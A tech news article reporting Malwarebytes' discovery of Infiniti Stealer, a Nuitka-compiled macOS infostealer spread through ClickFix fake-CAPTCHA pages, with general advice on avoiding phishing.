- Malwarebytes discovers Infiniti Stealer targeting macOS via ClickFix social engineering
- Victims were tricked into executing malicious Terminal code, bypassing traditional defenses.
- Stealer compiled with Nuitka, exfiltrates browser credentials, keychain data, wallets and screenshots
MacOS devices are increasingly being targeted by malware, as security researchers discover another information-stealing variant in the wild.
Malwarebytes has published a detailed report on malware called Infiniti Stealer, which was apparently compiled in a rather unusual way.
Infiniti Stealer is apparently distributed via a ClickFix social engineering attack. A ClickFix attack deceives the victim by presenting a “problem” and, at the same time, offering a “solution”. In this case, Malwarebytes says victims are redirected to check for updates.[.]com (most likely via phishing emails claiming that certain software needs to be updated to work properly) where they are shown a harmless-looking CAPTCHA.
Article continues below
Compiled with Nuitka
Besides the usual “I’m not a robot” checkbox, the CAPTCHA has one additional step (which should also serve as a major red flag): open Spotlight (the built-in search tool), run Terminal, and paste the given code. This code executes a dropper which, in turn, delivers Infiniti Stealer.
“Since the user executes the command directly, many traditional defenses are bypassed,” Malwarebytes explained. “There are no exploits, no malicious attachments and no drive-by downloads. »
What sets this malware apart is the fact that it is written in Python, but compiled with Nuitka, a compiler that converts Python code into standalone executables or optimized binaries.
The resulting product is a native macOS binary which researchers say makes it harder to scan and detect compared to your standard Python-based malware.
“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer,” Malwarebytes said.
An infostealer is a malware variant designed to exfiltrate sensitive data from target devices. Usually delivered via social engineering, infostealers are installed via droppers and attempt to upload various types of information to an attacker-controlled server, including browser data (cookies, stored passwords, cryptocurrency wallet plugins, etc.), passwords, sensitive files (.docx, .txt, .pdf and other formats), and other files deemed valuable.
Depending on the type of malware, these may attempt to download more or less data and have different obfuscation and persistence mechanisms.
How to protect yourself from phishing and information thieves
Infiniti is capable of stealing a wide range of sensitive data. Mainly, it searches for the credentials of Chromium-based browsers, as well as Firefox. It can exfiltrate macOS keychain entries, cryptocurrency wallets, and plain-text secrets into developer files such as .env. Finally, it will also exfiltrate screenshots captured while running.
Social engineering is a popular scam tactic, and phishing emails remain the primary attack vector. To avoid falling prey to these campaigns, exercise caution and a high level of skepticism toward all incoming communications, whether email, instant messaging, or telephone. Double-check all links shared in the email and look for typos, letters replaced with numbers, and suspicious variations of known domains. (For example, Microsoft is often spelled with an “RN” instead of “M” in phishing emails – rnicrosoft – making it almost indistinguishable).
Be careful when downloading attachments (especially when you receive an unexpected message) and make sure you’re using anti-phishing multi-factor authentication.
Via BeepComputer
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
